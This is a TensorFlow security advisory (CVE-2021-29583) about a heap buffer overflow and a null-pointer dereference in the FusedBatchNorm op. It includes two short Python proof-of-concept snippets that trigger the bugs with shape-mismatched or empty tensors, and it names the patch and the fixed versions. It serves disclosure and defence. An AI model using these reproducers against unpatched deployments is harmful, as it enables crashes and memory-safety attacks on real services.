1## TFSA-2021-072: Heap buffer overflow and undefined behavior in `FusedBatchNorm` 2 3### CVE Number 4CVE-2021-29583 5 6### Impact 7The implementation of `tf.raw_ops.FusedBatchNorm` is vulnerable to a heap buffer 8overflow: 9 10```python 11import tensorflow as tf 12 13x = tf.zeros([10, 10, 10, 6], dtype=tf.float32) 14scale = tf.constant([0.0], shape=[1], dtype=tf.float32) 15offset = tf.constant([0.0], shape=[1], dtype=tf.float32) 16mean = tf.constant([0.0], shape=[1], dtype=tf.float32) 17variance = tf.constant([0.0], shape=[1], dtype=tf.float32) 18epsilon = 0.0 19exponential_avg_factor = 0.0 20data_format = "NHWC" 21is_training = False 22 23tf.raw_ops.FusedBatchNorm( 24 x=x, scale=scale, offset=offset, mean=mean, variance=variance, 25 epsilon=epsilon, exponential_avg_factor=exponential_avg_factor, 26 data_format=data_format, is_training=is_training) 27``` 28 29If the tensors are empty, the same implementation can trigger undefined behavior 30by dereferencing null pointers: 31 32```python 33import tensorflow as tf 34import numpy as np 35 36x = tf.zeros([10, 10, 10, 1], dtype=tf.float32) 37scale = tf.constant([], shape=[0], dtype=tf.float32) 38offset = tf.constant([], shape=[0], dtype=tf.float32) 39mean = tf.constant([], shape=[0], dtype=tf.float32) 40variance = tf.constant([], shape=[0], dtype=tf.float32) 41epsilon = 0.0 42exponential_avg_factor = 0.0 43data_format = "NHWC" 44is_training = False 45 46tf.raw_ops.FusedBatchNorm( 47 x=x, scale=scale, offset=offset, mean=mean, variance=variance, 48 epsilon=epsilon, exponential_avg_factor=exponential_avg_factor, 49 data_format=data_format, is_training=is_training) 50``` 51 52The 53[implementation](https://github.com/tensorflow/tensorflow/blob/57d86e0db5d1365f19adcce848dfc1bf89fdd4c7/tensorflow/core/kernels/fused_batch_norm_op.cc) 54fails to validate that `scale`, `offset`, `mean` and `variance` (the last two 55only when required) all have the same number of elements as the number of 56channels of `x`. This results in heap out of bounds reads when the buffers 57backing these tensors are indexed past their boundary. 58 59If the tensors are empty, the validation mentioned in the above paragraph would 60also trigger and prevent the undefined behavior. 61 62### Patches 63We have patched the issue in GitHub commit 64[6972f9dfe325636b3db4e0bc517ee22a159365c0](https://github.com/tensorflow/tensorflow/commit/6972f9dfe325636b3db4e0bc517ee22a159365c0). 65 66The fix will be included in TensorFlow 2.5.0. We will also cherrypick this 67commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 682.1.4, as these are also affected and still in supported range. 69 70### For more information 71Please consult [our security 72guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for 73more information regarding the security model and how to contact us with issues 74and questions. 75 76### Attribution 77This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu 78X-Team. 79